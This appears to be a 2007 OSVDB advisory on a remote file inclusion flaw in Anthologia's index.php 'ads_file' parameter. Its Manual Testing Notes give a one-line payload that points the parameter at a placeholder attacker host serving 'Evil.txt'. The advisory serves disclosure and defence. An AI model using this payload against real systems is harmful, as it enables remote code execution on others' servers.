Anthologia index.php ads_file Variable Remote File Inclusion

2007-04-17T07:48:51
ID OSVDB:34083
Type osvdb
Reporter Dj7xpl(dj7xpl@yahoo.com)
Modified 2007-04-17T07:48:51

Description

Vulnerability Description

Anthologia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'ads_file' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Anthologia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the index.php script not properly sanitizing user input supplied to the 'ads_file' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

/index.php?ads_file=http://[attacker]/Evil.txt

References:

Vendor URL: http://www.dbfweb.com/anthology.htm Secunia Advisory ID:24908 Other Advisory URL: http://milw0rm.com/exploits/3751 ISS X-Force ID: 33705 FrSIRT Advisory: ADV-2007-1427 CVE-2007-2094 Bugtraq ID: 23524